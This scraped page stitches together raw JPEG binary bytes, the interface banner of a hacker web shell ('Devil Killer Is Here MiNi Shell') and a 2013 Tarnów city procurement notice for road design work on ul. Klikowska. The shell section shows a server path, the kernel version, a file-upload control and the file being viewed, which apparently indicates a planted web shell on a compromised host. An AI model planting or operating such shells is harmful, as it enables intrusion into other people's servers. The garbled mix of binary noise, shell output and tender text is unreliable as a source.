JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130131/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130131/42370-N-2013.html

<p class="kh_header"><b>Tarnów: Wykonanie dokumentacji projektowej oraz pełnienie nadzoru autorskiego w ramach realizacji zadania pn. Rozbudowa ul. Klikowskiej pomiędzy ul. Niedomicką a granicami miasta</b><br>
<b>Numer ogłoszenia: 42370 - 2013; data zamieszczenia: 31.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasta Tarnowa - Urząd Miasta Tarnowa, Biuro Realizacji Inwestycji w Centrum Rozwoju Miasta , ul. Nowa 4, 33-100 Tarnów, woj. małopolskie, tel. 14 6882708, faks 14 6222833.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.tarnow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji projektowej oraz pełnienie nadzoru autorskiego w ramach realizacji zadania pn. Rozbudowa ul. Klikowskiej pomiędzy ul. Niedomicką a granicami miasta.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest opracowanie projektów budowlanego i wykonawczego dla zadania pn. Rozbudowa ul. Klikowskiej pomiędzy ul. Niedomicką a granicami miasta. 
2.	Zakres zamówienia obejmuje:
2.1. Sporządzenie dokumentacji projektowej w tym: 
2.1.1.	Wykonanie mapy sytuacyjno-wysokościowej do celów projektowych w skali 1:500,
Wykonanie badań geologicznych w zakresie niezbędnym do prawidłowego opracowania dokumentacji,
2.1.2.	Opracowanie projektów: budowlanego i wykonawczego na niżej wskazany zakres:
a)	rozbudowę  drogi powiatowej - ul. Klikowskiej - z dostosowaniem do parametrów drogi klasy L o szerokości 6,0 m (2 x 3,0 m), w obszarze istniejącej obustronnej zabudowy mieszkaniowej z co najmniej ciągiem pieszym o szerokości 1,5 m po jednej stronie oraz ciągiem pieszo-rowerowym jednokierunkowym po drugiej stronie jezdni. Na pozostałym odcinku ulicy co najmniej ciąg pieszo-rowerowy jedno lub dwukierunkowy po jednej stronie jezdni. Przebudowę istniejących w pasie drogowym zjazdów oraz zatok i przystanków autobusowych.
b)	budowę odwodnienia ulicznego wraz z odprowadzeniem wód opadowych do potoku Klikowskiego. Na odcinku od ul. Niedomickiej do budynku nr 296, do odprowadzenia  wód opadowych zaleca się wykorzystać istniejący kolektor O 600 przebiegający przez tereny prywatne po południowej stronie ul. Klikowskiej. Kolektor ten odprowadza wody opadowe do potoku Klikowskiego.  Przy wykonywaniu mapy sytuacyjno-wysokościowej należy dokonać aktualizacji pomiarów geodezyjnych jego posadowienia i trasy lokalizacji. Według stanu zasobów mapowych na jego trasie jest kilka przerw. W dokumentacji projektowej należy ująć: remont kolektora w zakresie studzienek kanalizacyjnych, w tym wymianę lub wykonanie włazów żeliwnych, koszty płukania i czyszczenia kanału.
c)	budowę sieci oświetlenia ulicznego,
d)	zabezpieczenie lub przełożenie istniejącego uzbrojenia podziemnego i naziemnego, wynikające z uzyskanych warunków technicznych od ich użytkowników.
2.1.3.	Wykonanie docelowego projektu organizacji ruchu,
2.1.4.	Wykonanie projektu czasowej organizacji ruchu (na czas wykonywanych robót),
2.1.5.	Wykonanie projektu inwentaryzacji zieleni,
2.1.6.	Wykonanie operatu wodno - prawnego na odprowadzenie wód opadowych 
do potoku Klikowskiego,
2.1.7.	Wykonanie  przedmiarów robót.

    Powyższe elementy należy opracować w rozbiciu na branże:
a)	projekt branży drogowej,
b)	projekt branży sieci kanalizacyjnej, 
c)	projekt branży elektrycznej 
d)	inwentaryzacja zieleni,
e)	projekty branżowe niezbędnych przekładek lub zabezpieczenia istniejącego uzbrojenia podziemnego i naziemnego,
2.2. Wykonanie Specyfikacji Technicznej Wykonania i Odbioru Robót Budowlanych,
2.3.  Wykonanie kosztorysów inwestorskich, 
2.4. Przygotowanie dokumentacji prawnej do uzyskania decyzji zezwolenia na realizację inwestycji drogowej: zgody wszystkich właścicieli nieruchomości na których lokalizowane będą urządzenia uzbrojenia podziemnego poza liniami rozgraniczającymi pasa drogowego, projekt podziału wszystkich nieruchomości wraz z gminnymi w zakresie linii rozgraniczających pasa drogowego, raport oddziaływania przedsięwzięcia na środowisko w celu uzyskania decyzji 
o środowiskowych uwarunkowaniach zgody. 
Wykonawcy zostanie udzielone pełnomocnictwo do występowania w imieniu Zamawiającego.
2.5. Uzyskanie decyzji o środowiskowych uwarunkowaniach zgody, decyzji pozwolenia wodno prawnego, oraz innych, wymaganych przepisami, opinii i decyzji koniecznych do złożenia przez Zamawiającego wniosku o wydanie decyzji zezwolenia na realizację inwestycji drogowej,
2.6. Aktualizację - w razie potrzeby, kosztorysów inwestorskich w okresie 2 lat od daty ich wykonania.
2.7.  Pełnienie nadzoru autorskiego przez projektantów w zakresie:
a)  zgodnym z art. 20 ustawy z dnia 07.07.1994 r. Prawo budowlane (Dz.U. 
 z 2010, Nr 243, poz. 1623 z późn. zm.)
b)	udzielania odpowiedzi i wyjaśnień dotyczących prac objętych dokumentacją projektową w terminie nie dłuższym niż 3 dni od daty powzięcia informacji o zaistniałym problemie oraz opracowywanie rozwiązań alternatywnych w terminie wyznaczonym przez Zamawiającego,
c)	stawiania się na budowie w terminie nie dłuższym niż 3 dni od daty wezwania 
w razie konieczności, średnio jeden raz w miesiącu w trakcie realizacji zadania.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.22.10.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.11.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Wykonawca obowiązany jest do wniesienia wadium w wysokości 4.000 zł (słownie: cztery tysiące złotych) w terminie wyznaczonym do składania ofert. Wadium może być wniesione w formach określonych w art. 45 ust. 6 ustawy Prawo zamówień publicznych.
2. Wadium w pieniądzu należy wnieść przelewem na konto: Bank Handlowy o/Tarnów 76 1030 1250 0000 0000 8800 0099, z zaznaczeniem na dowodzie wpłaty: wadium - dokumentacja projektowa - Rozbudowa ul. Klikowskiej pomiędzy ul. Niedomicką a granicami miasta. Wadium musi znaleźć się na rachunku bankowym Zamawiającego nie później niż  w dniu i w godzinie składania ofert. Dowód wniesienia wadium należy dołączyć do oferty. Jednocześnie Zamawiający informuje, iż przesądzającym o wniesieniu wadium jest zaksięgowanie kwoty wadium na koncie Zmawiającego, a nie dołączenie dowodu jego uiszczenia.
3. W razie wyboru formy wniesienia wadium innej niż pieniądz oryginał dokumentu należy złożyć do 
    dnia i godziny składania ofert w Kasie Urzędu Miasta Tarnowa, ul. Nowa 4, 33-100 Tarnów, pok. 113, natomiast kopię dokumentu potwierdzającego wniesienie wadium dołącza do oferty. Jeżeli Wykonawca prześle ofertę pocztą, kopię dowodu wniesienia wadium załącza do oferty, natomiast oryginał umieszcza w oznaczonej kopercie: oryginał dowodu wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku. Ocena spełniania warunku odbędzie się na podstawie analizy treści oświadczenia -(pkt III.4.1)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się Wykonawcy, którzy zrealizowali należycie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie minimum  jedną usługę polegającą na opracowaniu dokumentacji projektowej budowy lub przebudowy drogi o kategorii co najmniej drogi powiatowej (ustawa z dnia 21 marca 1985r. o drogach publicznych określa kategorię dróg, (Dz.U. z 2007 r., Nr 19 poz. 115 ze zm.) o wartości (cenie projektu)  nie mniejszej niż 100.000 zł brutto. 
Zamawiający wymaga załączenia dokumentu potwierdzającego, że usługa/i została/y wykonane należycie - np. referencje, protokół odbioru , opinia zamawiającego na rzecz którego zamówienie zostało zrealizowane.
W przypadku, gdy usługa w zakresie wykonania  dokumentacji projektowej budowy lub przebudowy drogi była częścią zamówienia o większym zakresie, należy wyszczególnić kwotę tej usługi z łącznej wartości zamówienia.

 Jeżeli Wykonawca w przetargu polega na zasobach innego podmiotu - wiedzy 
i doświadczeniu (niezależnie od charakteru prawnego łączących go z nimi stosunków):
a) podmiot ten musi uczestniczyć w wykonywaniu zamówienia, ponadto z dokumentu musi wynikać, że usługi zrealizowane przez ten podmiot zostały wykonane  należycie,
b) zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami - w szczególności przedstawia w tym celu w oryginale pisemne zobowiązanie tego/tych podmiotu/ów do oddania mu do dyspozycji wiedzy i doświadczenia jak wskazano wyżej, na okres korzystania z przy wykonywaniu zamówienia.

W przypadku dokumentów na potwierdzenie warunku udziału w postępowaniu, Zamawiający przelicza wartość usług określonych w walutach innych niż PLN według średniego kursu Narodowego Banku Polskiego danej waluty obowiązującego w dniu ogłoszenia zamówienia w Biuletynie Zamówień Publicznych. Średnie kursy walut dostępne są pod następującym adresem: http://www.nbp.pl/home.aspx?f=/Kursy/kursy.htm

Ocena spełnienia warunku na podstawie analizy treści oświadczenia i dokumentów -(pkt III.4.1)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku. Ocena spełniania warunku odbędzie się na podstawie analizy treści oświadczenia -(pkt III.4.1)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga wykazania, że Wykonawca dysponuje lub będzie dysponował  osobami z uprawnieniami budowlanymi do projektowania bez ograniczeń w następujących specjalnościach: 
a)	drogowej oraz posiadającą doświadczenie zawodowe w projektowaniu - wykonał min. 1 dokumentację projektową budowy lub przebudowy drogi o kategorii co najmniej drogi powiatowej  (ustawa z dnia 21 marca 1985r. o drogach publicznych określa kategorię dróg (Dz.U. z 2007 r., Nr 19 poz. 115 ze zm.). Osoba ta będzie pełniła funkcję projektanta układu drogowego.
b)	instalacyjnej w zakresie sieci kanalizacyjnych oraz posiadającą doświadczenie zawodowe w projektowaniu - wykonał min. 1 dokumentację projektową  budowy lub przebudowy sieci kanalizacyjnej. Osoba ta będzie pełniła funkcję projektanta sieci kanalizacyjnych.
c)	instalacyjnej  w zakresie sieci,  urządzeń elektrycznych i elektroenergetycznych oraz posiadającą doświadczenie zawodowe w projektowaniu - wykonał min. 1 dokumentację projektową  budowy lub przebudowy sieci elektrycznych. Osoba ta będzie pełniła funkcję projektanta sieci elektrycznych.

W przypadku uprawnień dla osób dopuszcza się odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów lub odpowiadające im kwalifikacje zawodowe uprawniające do kierowania robotami budowlanymi w danej specjalności nabyte w państwach członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej lub Europejskiego Porozumienia o Wolnym Handlu (EFTA) - stronach umowy 
o Europejskim Obszarze Gospodarczym, z zastrzeżeniem przepisu art. 12 a ustawy Prawo budowlane (Dz. U. z 2010, Nr 243, poz. 1623 z późn. zm.) oraz przepisów ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2008 r., Nr 63, poz. 394).

Jeżeli Wykonawca (niezależnie od charakteru prawnego łączących stosunków z innymi podmiotami) polega na zasobach innych podmiotów - osobach zdolnych do wykonania zamówienia, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami. W szczególności przedstawia w tym celu w oryginale pisemne zobowiązanie tego/tych podmiotu/ów do oddania mu do dyspozycji osób z uprawnieniami i doświadczeniem jak wskazano wyżej, na okres korzystania z tych osób przy wykonywaniu zamówienia. 

Dopuszcza się łączenie funkcji projektanta w kilku specjalnościach przez jedną osobę pod warunkiem , że osoba ta będzie posiadała wymagane uprawnienia i doświadczenie. 

Ocena spełnienia warunku na podstawie analizy treści oświadczenia i dokumentów -(pkt III.4.1)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku. Ocena spełniania warunku odbędzie się na podstawie analizy treści oświadczenia -(pkt III.4.1)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa wyżej zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania (wystawionym nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert).
2.	W przypadku, gdy uprawnienie do podpisania oferty nie wynika z przedłożonego w ofercie dokumentu - pkt III.4.2), do oferty należy załączyć stosowne upoważnienie (pełnomocnictwo) podpisane przez osobę upoważnioną do zaciągania zobowiązań cywilno-prawnych w imieniu Wykonawcy. Pełnomocnictwo należy przedstawić w formie oryginału lub kopii poświadczonej notarialnie.
3.	Warunek dysponowania osobami zdolnymi do wykonywania zamówienia uznany zostanie za spełniony przez konsorcjum w przypadku, gdy przynajmniej jeden uczestnik konsorcjum spełni ten warunek, bądź warunek zostanie spełniony łącznie.
4.	Warunek posiadania niezbędnej wiedzy i doświadczenia  uznany zostanie za spełniony przez konsorcjum, gdy przynajmniej jeden z członków konsorcjum wykaże wykonanie usługi, o której mowa w pkt III.3.2.
5.	Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu w oryginale pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia (art. 26 ust 2b ustawy Pzp).
6.	W przypadku, gdy Wykonawca będzie polegać na wiedzy i doświadczeniu innego podmiotu, pisemne zobowiązanie winno zawierać informację o sposobie udostępnienia wiedzy i doświadczenia, tj. w jakim charakterze podmiot ten będzie uczestniczył w wykonaniu zamówienia.
7.	W celu wykazania, że Wykonawca nie podlega wykluczeniu z postępowania na podstawie art. 24 ust. 2 ustawy przedkłada oświadczenia i dokumenty określone w pkt. III.4.1 oraz dokument potwierdzający wniesienie wadium.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający przewiduje możliwość dokonania zmian umowy:
1)	Terminu wykonania przedmiotu umowy w przypadkach:
a)	wystąpienia zamówień dodatkowych,
b)	wystąpienia zdarzeń losowych, 
c)	opóźnienia w uzyskaniu decyzji, uzgodnień niezależnego od Wykonawcy, a także 
w przypadku zamiany uzgodnienia, bądź wniesienia po wydaniu decyzji lub uzgodnień  dodatkowych wymogów skutkujących koniecznością dokonania zmian lub uzupełnień 
w projekcie,
d)	 zmiany przepisów powodujących konieczność uzyskania dokumentów, które te przepisy narzucają,
e)	w przypadku konieczności dokonania korekt w zatwierdzonym przez Zamawiającego rozwiązaniu projektowym, wynikających ze stanowiska instytucji uzgadniających (opiniujących),
f)	rozszerzenia zakresu podwykonawstwa w stosunku do wskazanego w ofercie Wykonawcy, o ile posłużenie się podwykonawcą doprowadzi do skrócenia terminu wykonania przedmiotu umowy, 
2)	Sposobu i zakresu wykonania prac w przypadkach: 
a)	zmiany przepisów powodujących konieczność przyjęcia innych rozwiązań technicznych lub uzyskania dodatkowych decyzji,
b)	zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie części przedmiotu umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy,
c)	ograniczenia zakresu rzeczowego.
3)	Innych postanowień umowy w przypadkach:
a)	zmiany stawek podatku od towarów i usług,
b)	zmiany nazwy zadania
c)	zmiany podwykonawców,
d)	przekształceń Wykonawcy lub zbycia przedsiębiorstwa,
e)	zmiany sposobu rozliczania umowy lub dokonywania płatności na rzecz Wykonawcy lub podwykonawcy.
2.	Wykonawca nie może przenieść na osobę trzecią praw lub obowiązków wynikających z umowy w całości lub części, z zastrzeżeniem ust.1 pkt. 3 lit. d.
3.	Zamawiającemu przysługuje prawo odstąpienia od umowy w przypadku rozpoczęcia postępowania upadłościowego lub likwidacji firmy Wykonawcy. 
4.	W przypadku zaistnienia okoliczności określonych w ust. 3 Wykonawca niezwłocznie zobowiązany jest do powiadamia  Zamawiającego, w formie pisemnej.
5.	Zmiana postanowień umowy może nastąpić za zgodą obu stron na piśmie w formie aneksu pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://portal.tarnow.bip-gov.info.pl/bip/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Biuro Realizacji Inwestycji w Centrum Rozwoju Miasta, 33-100 Tarnów, ul. Nowa 4, pok. 317.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.02.2013 godzina 10:00, miejsce: Urząd Miasta Tarnowa, 33-100 Tarnów, ul. Nowa 4, parter sala nr 1 - Kancelaria Główna w Centrum Obsługi Mieszkańców.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





